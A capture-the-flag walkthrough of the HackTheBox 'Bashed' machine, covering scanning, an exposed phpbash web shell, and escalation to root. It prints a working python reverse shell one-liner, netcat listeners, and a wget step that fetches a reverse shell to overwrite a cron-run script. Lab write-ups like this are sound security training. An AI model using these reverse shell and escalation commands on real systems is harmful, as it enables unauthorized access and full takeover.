HackTheBox (HTB): Bashed — Walkthrough
Hi,
This article is about Bashed machine hosted on HTB. Let’s get started:
Scanning:
Scan machine with Nmap:
nmap -sC -sV 10.10.10.68
We found that there is Apache running on the machine let’s explore it from browser:
Seems like this is the only page on the website. Let’s enumerate the server with directory buster tool to find either there are hidden web pages or not.
dirb http://10.10.10.68
We found different folders hosted on server. Ass we know css folder is commonly for css files hosted on server. Let’s Explore /dev/ folder from browser.
Here we find phpbash web pages. Let’s Explore theses pages:
These web pages are giving interface to communicate with the terminal of the server. This means that we can get reverse shell from this webpage by simply executing the script.
Gaining Access:
After searching I found python reverse shell script from Pentest Monkey.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234)); //Change IP and Port
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Do not run this script blindly. Before running this script modify IP Address with your IP Address and if you like you can also enter your desired port. I have replaced 1234 port with 9999.
Before running above script make sure netcat listener is running on mentioned port.
nc -lnvp 9999
Now run the above mention script on target machine.
Once you run the script on the web page after a few seconds you will receive reverse connection on your netcat listener as shown in figure 1.9 below:
Now after wondering around in directories I have finally found the user flag.
The flag is in /home/arrexel/ directory as shown in figure 1.11 below:
Now to get root user flag we need to be on root user. In order to get to root user we need to escalate the privileges.
Privilege Escalation:
First we to get info of our current privileges and for that we will use command:
sudo -l
This means the www-data user can run commands as scriptmanager user. Let’s try to access scriptmanager account shell from www-data with command given below:
sudo -u scriptmanager /bin/bash
Use python script for TTY:
python -c ‘import pty; pty.spawn(“/bin/bash”);’
Now we go to base directory and again start exploring to get any new info.
Here we got interesting info. We got a suspicious folder named scripts. Let’s Explore this folder:
In this folder we got these two files lets explore both of them:
There is a simple script in ‘test.py’ which writes output on file ‘test.txt’. One more interesting thing we got is that creation time of file test.txt is keep updating to the latest time. This mean there is a cron job or something like background process is running which runs test.py script automatically. If we replace the test.py file with our test.py file containing reverse shell code and check might we can get reverse shell of root user or not.
In order to do that create a HTTP Server using python from the directory where we have saved our reverse shell code.
In order to create a server using python command:
python -m SimpleHTTPServer 8000
Now on the other machine shell we will run wget command to download reverse shell code in the machine.
wget http://10.10.14.7:8000/test.py
Our file is downloaded with the name of test.py.1, now I removed test.py file and changed the name of test.py.1 file to test.py so machine will run only that file which we want to execute for reverse shell. Code for reverse shell is same as I used at the start of this write-up.
Now turn on your netcat listener and wait a minute to get executeed that test.py file to get reverse shell.
nc -nvlp 8888
After a minute you should receive a reverse shell with root account on this listener as shown in figure 1.20 below:
Here we go we have got root privileges and now go to root directory and get root flag.
Here we have successfully completed this challenge. Thanks for staying till here.
